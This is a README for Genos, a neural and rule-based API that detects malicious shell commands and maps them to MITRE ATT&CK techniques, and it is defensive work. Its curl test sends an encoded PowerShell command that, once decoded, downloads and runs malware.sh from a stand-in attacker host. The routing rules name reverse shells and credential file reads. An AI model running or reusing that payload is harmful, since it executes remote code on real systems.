Genos is a two-stage neural pipeline for real-time malicious command detection and MITRE ATT&CK technique attribution, served as a REST API over Gunicorn and Flask.
The system was developed as part of an IEEE research programme. This README is derived directly from the source code (engine.py, app.py, gunicorn.conf.py) and reflects the current behaviour of the main branch only.
The core inference logic lives in engine.py. The Flask API in app.py wraps it.
When the process starts:
python-dotenvloads.envfrom the working directory.GenosEngineis constructed once — no hot-reloading of models.- The engine resolves its asset paths in this order for each file:
- absolute path (if given)
- relative to
os.getcwd() - relative to the directory containing
engine.py - each fallback candidate in turn
- The specialist label map is loaded from the first file that exists:
map_pathargument passed by the callerconfig/specialist_map.json← current live pathmodels/specialist_map.json- If none found: built dynamically by reading
mitre_idvalues from the raw MITRE CSV and sorting them
RobertaTokenizeris loaded frommicrosoft/codebert-base(downloaded on first run, cached by HuggingFace).- Both model checkpoints are loaded with
torch.load(..., weights_only=True). - The app calls
engine.scan("warmup")before accepting traffic;/healthreturns{"status": "ok"}once this completes.
Before tokenisation, scan() applies an entropy-aware deobfuscation loop. A command is treated as obfuscated if it matches any of these patterns (case-insensitive regex) or if its Shannon entropy exceeds 5.2 bits:
| Pattern | What it catches |
|---|---|
\[char\] |
PowerShell character-code constructions |
base64 / frombase64 |
Inline Base64 references |
reverse\( |
String reversal wrappers |
\+[ ]*' |
String concatenation fragments |
\$[a-z0-9_]{10,} |
Long obfuscated variable names |
\\x[0-9a-f]{2} |
Hex byte escapes |
If obfuscated, the engine runs up to 5 deobfuscation passes. Each pass applies, in order:
universal_decoder— decodes the whole string if it matches a bare Base64 regexdecode_embedded_base64— decodesFromBase64String('...')payloads inlineextract_powershell_payload— extracts the payload from&(builder)(payload)invocation wrappers, including[System.Text.Encoding]::UTF8.GetString(...)variantsdeobfuscate_char_constructions— resolves[char]65,(65..67) | % { [char]$_ }, and mixed range+bareword patterns into literal charactersclean_concatenation— collapses"ab" + "cd"and"ab" + barewordformspyminusone.deobfuscate(..., lang="powershell")— optional AST-level simplification ifpyminusoneis installed; silently skipped otherwise- Runs char and concatenation passes again after any AST simplification
The loop terminates early when:
- a pass produces no change in the text
- the absolute entropy delta between passes is less than
0.01bits
After the loop, the processed command is lowercased and stripped before tokenisation.
Uses RobertaTokenizer from microsoft/codebert-base:
max_length:256(override withGENOS_MAX_TOKENSenv var)padding:max_lengthtruncation: enabledreturn_tensors:"pt"
Architecture:
CodeBERT CLS token (768-d)
→ Dropout(0.2)
→ Linear(768, 1024)
→ GELU
→ Dropout(0.2)
→ Linear(1024, 3)
Inference runs under torch.no_grad() and torch.amp.autocast:
- CUDA device:
float16 - CPU device:
bfloat16
The model outputs three class probabilities mapped as:
| Model index | Internal label | Public label |
|---|---|---|
| 0 | Benign | Benign |
| 1 | Malicious | Malicious |
| 2 | Context_Dependent | Suspicious |
After the neural forward pass, a rule-based routing layer applies over the raw class probabilities. Routing can override the model output based on:
- Hard overrides — deterministic pattern matches (e.g. base64-decode piped to shell, reverse shell patterns, credential file reads) that force
Maliciousregardless of model confidence - Malicious promotion — high-risk behavioral features (e.g. exploit tooling, sensitive sources) that promote weak
Benign/Suspiciouspredictions toMalicious - Malicious cap — commands that are risky but lack definitive attack indicators (e.g.
chmod 777,crontab -l) are downgraded fromMalicioustoSuspicious - Benign safe overrides — high-confidence benign predictions with no suspicious signals pass through directly
- Probability routing — remaining cases route by thresholds, margin, suspicious signal count, and feature set
The final public label is one of: Benign, Suspicious, Malicious, or Context_Dependent (requires_context action).
Tier 2 always runs, regardless of the Tier 1 label. Because it uses a TF-IDF + RF pipeline rather than a neural model, inference takes approximately 90 ms and adds negligible overhead.
Model file: models/specialist_tfidf_char_rf.pkl (scikit-learn pipeline, loaded with joblib).
Input text is built by _build_variant_a_text(), which calls the parser/ module to produce a structured "Variant A" representation of the command:
RAW: <normalised command>
RESIDUAL: <parser-extracted residual tokens>
For obfuscated commands the engine runs Tier 2 twice — once on the original text, once on the decoded payload — and merges results by taking the highest confidence score per MITRE code. The final response caps at 5 codes.
Classes come from config/specialist_map.json (108 MITRE techniques). The pipeline's integer class indices are mapped back to MITRE IDs via _tfidf_idx_to_label.
GenosEngine.scan() returns:
{
"label": "Malicious",
"label_confidence": 0.9981,
"deobfuscated_cmd": "invoke-expression ...",
"MITRE_codes": [
{ "code": "T1059", "confidence": 97.43 },
{ "code": "T1021", "confidence": 1.22 },
{ "code": "T1078", "confidence": 0.81 },
{ "code": "T1003", "confidence": 0.48 },
{ "code": "T1087", "confidence": 0.06 }
]
}For obfuscated commands with a decoded payload, two additional fields are populated:
{
"decoded_payload": "<deobfuscated text>",
"payload_mitre_codes": [ ... ]
}For Context_Dependent labels:
{
"label": "Context_Dependent",
"action": "requires_context",
...
}Notes:
labelis one of:Benign,Suspicious,Malicious,Context_Dependentlabel_confidenceis a raw probability (0–1) from the engine;app.py's_to_percentage()converts it to a percentage for the HTTP responseMITRE_codesis present on all responses (Tier 2 always runs); it may be empty if no codes exceed the classifier's thresholddeobfuscated_cmdisnullwhen the input was not flagged as obfuscated
Tier 1 uses a CodeBERT neural model. Tier 2 uses a TF-IDF char n-gram + Random Forest sklearn pipeline.
| File | Purpose |
|---|---|
models/gatekeeper.pt |
Tier 1 — 3-class CodeBERT gatekeeper (Benign / Suspicious / Malicious) |
models/specialist_tfidf_char_rf.pkl |
Tier 2 — active MITRE attribution model (char n-gram TF-IDF + RF) |
models/specialist_tfidf_rf.pkl |
Tier 2 alternative — word-level TF-IDF + RF variant (not loaded by default) |
config/specialist_map.json |
Maps integer class indices to MITRE technique IDs (108 classes) |
config/gatekeeper_meta.json |
Gatekeeper threshold and training metadata read at startup |
Model weights and large artefacts are tracked with Git LFS (.gitattributes). The pkl files are excluded from git entirely via .gitignore due to their size (2.4–2.8 GB); they must be provided out-of-band (e.g. direct copy, shared storage, or LFS if migrated).
Served by Gunicorn on 127.0.0.1:6001 by default.
{ "status": "ok" }Returns "loading" if the engine warm-up has not yet completed.
Requires a running MongoDB instance configured via MONGO_URI. API keys are stored in the genos.api_keys collection; usage is tracked in genos.usage.
Request:
{
"api_key": "YOUR_KEY",
"command": "net user /domain"
}The API key is read from the JSON body, not from a header. The command may be plain text or a Base64-encoded string; app.py attempts a full Base64 decode before passing to the engine, falling back to plain text if decode fails.
Response (malicious):
{
"label": "Malicious",
"label_confidence": 99.81,
"MITRE_codes": [
{ "code": "T1087", "confidence": 97.43 },
{ "code": "T1069", "confidence": 1.22 }
]
}Response (benign):
{
"label": "Benign",
"label_confidence": 99.99,
"MITRE_codes": []
}Error responses:
| Status | Meaning |
|---|---|
400 |
Missing api_key or command |
401 |
API key not found in MongoDB |
500 |
Engine error |
503 |
MONGO_URI not configured |
Intended for local testing, CI, and benchmark scripts where MongoDB is not required.
Request:
{
"command": "whoami",
"internal_token": "optional"
}internal_token is only enforced when INTERNAL_TEST_TOKEN is set in the environment. Omit the field entirely when the env var is unset.
Response shape is identical to /scan.
Always use a dedicated venv rather than the system Python or any checked-in environment directory. The project .gitignore already excludes venv/ and my_flask_env/.
cd genos_api
python3 -m venv .venv
source .venv/bin/activate
python -m pip install --upgrade pip setuptools wheelUse .venv (or any name that .gitignore covers) rather than venv if you want the directory ignored automatically. The existing .gitignore entry covers venv/ literally.
pip install -r requirements.txtPyTorch and CUDA: requirements.txt pins the major/minor version of PyTorch but not the CUDA wheel suffix, because the suffix is machine-specific. If you need a specific CUDA build, install it first from the official index before running the above:
# Example: CUDA 12.1 build
pip install torch==2.5.1+cu121 --index-url https://download.pytorch.org/whl/cu121
pip install -r requirements.txtCPU-only inference works without any CUDA toolkit; the engine auto-detects the device and uses bfloat16 autocast on CPU.
Optional — PowerShell deobfuscation enhancement:
pip install pyminusoneIf pyminusone is not installed the engine falls back to its built-in deobfuscation rules silently.
cp .env.example .env
# edit .env with your values| Variable | Used in | Default | Purpose |
|---|---|---|---|
MONGO_URI |
app.py |
— | Connection string for MongoDB; enables /scan route |
INTERNAL_TEST_TOKEN |
app.py |
— | Optional auth token for /scan/internal; unenforced if unset |
GENOS_API_BIND |
gunicorn.conf.py |
127.0.0.1:6001 |
Gunicorn bind address |
GENOS_MAX_TOKENS |
engine.py |
256 |
Tokeniser max sequence length |
CURRENT_TIME |
app.py |
"2026-03-17T00:00:00.000+00:00" |
Timestamp written into Mongo usage records |
GENOS_T1_EFFECTIVE_BATCH |
trainer1.py |
256 |
Training only: effective batch size |
GENOS_T1_MICRO_BATCH |
trainer1.py |
32 |
Training only: micro-batch size for gradient accumulation |
GENOS_T1_USE_COMPILE |
trainer1.py |
0 |
Training only: set 1 to enable torch.compile() |
source .venv/bin/activate
gunicorn -c gunicorn.conf.py app:appThe worker loads both CodeBERT models and runs a warm-up pass before accepting traffic. The 300 s Gunicorn timeout covers this load time. On a machine with a GPU and the model weights already cached locally, startup typically takes under 60 s.
curl -s http://127.0.0.1:6001/health
curl -s -X POST http://127.0.0.1:6001/scan/internal \
-H "Content-Type: application/json" \
-d '{"command": "whoami"}'
curl -s -X POST http://127.0.0.1:6001/scan/internal \
-H "Content-Type: application/json" \
-d '{"command": "powershell -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcAA6AC8ALwBhAHQAdABhAGMAawBlAHIALgBjAG8AbQAvAG0AYQBsAHcAYQByAGUALgBzAGgAIAB8ACAASQBFAFgA"}'bash scripts/ops/reload_api.sh reload # stop → start → health check
bash scripts/ops/reload_api.sh status # check /healthThe reload script is hardcoded to 127.0.0.1:6001 and activates venv/bin/activate relative to the project root.
import sys
sys.path.insert(0, "/path/to/genos_api")
from engine import GenosEngine
engine = GenosEngine()
result = engine.scan("net localgroup administrators")
print(result)| Setting | Value | Reason |
|---|---|---|
bind |
127.0.0.1:6001 |
Loopback only; expose via reverse proxy |
workers |
1 |
One model copy in GPU memory; more workers multiplies VRAM usage |
worker_class |
sync |
CUDA cannot survive a post-fork environment |
timeout |
300 |
Covers model loading on startup |
preload_app |
not set | Omitted deliberately; pre-loading would fork after CUDA initialisation |
Run Gunicorn on localhost and expose Nginx (or Caddy) publicly. Never bind Gunicorn directly to 0.0.0.0 in production without a reverse proxy.
Minimal Nginx location block:
location /scan {
proxy_pass http://127.0.0.1:6001;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_read_timeout 60s;
}[Unit]
Description=Genos API
After=network.target
[Service]
Type=simple
User=genos
WorkingDirectory=/opt/genos_api
EnvironmentFile=/opt/genos_api/.env
ExecStart=/opt/genos_api/.venv/bin/gunicorn -c gunicorn.conf.py app:app
Restart=on-failure
RestartSec=5
[Install]
WantedBy=multi-user.targetRuns a deployment-aligned evaluation comparing the Genos neural pipeline against a TF-IDF + Random Forest baseline.
cd genos_api
python scripts/benchmark/ieee.pyMetrics reported: Tier 1 AUC, precision, recall, F1; Tier 2 top-1 / top-3 accuracy; macro F1; deobfuscation time; end-to-end latency at multiple benign traffic ratios; ROC curve saved to logs/.
Hits the live API with configurable concurrency. Defaults: 500 requests, 50 % malicious, 20 concurrent workers, 85 % confidence threshold.
# Requires API running on 127.0.0.1:6001
python scripts/benchmark/internal_api_test.pyResults are written to live_stress_report.txt.
| Script | Purpose |
|---|---|
scripts/training/trainer1.py |
Train the Tier 1 Gatekeeper binary classifier |
scripts/training/trainer2_hybrid.py |
Train the Tier 2 Specialist MITRE attribution classifier |
scripts/training/trainer_tfidf.py |
Train the TF-IDF baseline classifier |
scripts/data/synthesize_gatekeeper_data.py |
Synthesize gatekeeper training data |
scripts/data/augment_context_sensitivity.py |
Context-sensitivity augmentation |
scripts/data/data_scraper.py |
Raw data collection |
Training data lives in data/training/genos_dataset/. Trainers read from the CSVs with the schema command (string), mitre_id (string — "Benign" or a MITRE technique ID such as T1059). Hybrid trainers additionally read from the JSONL files in the same directory.
app.py Flask application and route handling
engine.py GenosEngine — deobfuscation and two-tier inference
gunicorn.conf.py Gunicorn runtime configuration
requirements.txt Python dependencies
reqs.txt Alias: -r requirements.txt
.env.example Environment variable template
config/
specialist_map.json Active 108-class MITRE technique → integer label map
definitive_mitre_map.json Full MITRE technique reference
label_map.json Human-readable label definitions
meta/ Training run metadata and backups (not loaded at runtime)
gatekeeper_meta.json
specialist_meta.json
specialist_residual_a_meta.json
specialist_residual_b_meta.json
specialist_map_108.json.bak
...
models/
gatekeeper.pt Tier 1 3-class CodeBERT gatekeeper weights (Git LFS)
specialist_tfidf_char_rf.pkl Tier 2 active model — char n-gram TF-IDF + RF (not in git, >2 GB)
specialist_tfidf_rf.pkl Tier 2 word-level variant (not in git, >2 GB)
archive/ Historical and experimental checkpoints (Git LFS)
gatekeeper_pre_augment.pt
gatekeeper_pre_context_augment.pt
specialist_residual_a.pt
specialist_residual_b.pt
data/training/
genos_dataset/ Primary train / val / test splits (CSV)
gatekeeper_train.csv Benign + malicious — Gatekeeper training
gatekeeper_val.csv
gatekeeper_test.csv
specialist_train.csv Malicious commands — Specialist training
specialist_val.csv
specialist_test.csv
context_augment_*.csv Context-augmented variants
synthetic_gatekeeper_*.csv Synthetic benign augmentation splits
hybrid_specialist_*.jsonl Hybrid JSONL specialist format
provenance.json Dataset build provenance record
genos_residual/ Residual variant datasets (JSONL, variants a/b/c)
genos_residual_cli/ CLI-specific residual datasets
genos_residual_expanded/ Expanded residual datasets
parser/ Command parsing and rule engine module
parser.py Main parser entry point
rule_engine.py Rule-based pre-classification
deobfuscator.py Standalone deobfuscation logic
semantic_features.py Feature extraction helpers
candidate_mask.py Candidate MITRE label masking
residual_text.py Residual text extraction
build_*.py Dataset builder scripts
eval_*.py Parser evaluation scripts
validate_*.py Validation harnesses
parser_gold.jsonl Gold-label evaluation set
parser_schema.json Parser output schema
scripts/
training/
trainer1.py Gatekeeper training script
trainer2_hybrid.py Specialist hybrid training script
trainer_tfidf.py TF-IDF baseline training
generate_cli_specialist_dataset.py CLI-specific dataset generation
data/
augment_context_sensitivity.py Context-sensitivity augmentation
data_scraper.py Raw data collection
synthesize_gatekeeper_data.py Synthetic gatekeeper data generation
benchmark/
ieee.py IEEE pipeline benchmark (neural vs TF-IDF baseline)
internal_api_test.py Async live API stress test
mitre_benchmark.py MITRE technique attribution benchmark
gatekeeper_3class.py Three-class gatekeeper evaluation
benign_fp_test.py False-positive testing on benign traffic
e2e_llm.py End-to-end LLM comparison benchmark
tfidf_vs_openai.py TF-IDF vs OpenAI comparison
test_variant_a_inference.py Residual variant A inference test
3class/ Three-class benchmark results and corpora
ops/
reload_api.sh Stop → start → health-check helper
gunicorn.ctl Gunicorn process control file
logs/ Generated benchmark output (gitignored in production)
ieee_results_*.json IEEE benchmark result snapshots
ieee_roc_curve_*.png ROC curve plots
mitre_benchmark.json
gatekeeper_3class_benchmark.json
tfidf_specialist_results.json
tfidf_vs_openai.json
trainer1_balanced.log
real_world_benign_results.csv
.envis excluded by.gitignore; never commit real secrets/scanrequires a valid API key checked against MongoDB; no unauthenticated inference path exists on that route/scan/internalbypasses the database and should not be exposed publicly; keep it behind a firewall or protect it withINTERNAL_TEST_TOKEN- Gunicorn is bound to loopback only; the reverse proxy is responsible for TLS termination and rate limiting
- The deobfuscation loop is bounded to 5 passes with an entropy-delta early-exit to prevent deobfuscation bombs from causing unbounded processing
- Model weights are loaded with
weights_only=Trueto prevent arbitrary code execution via malicious checkpoint files
If you use Genos in your research, please cite the associated IEEE paper.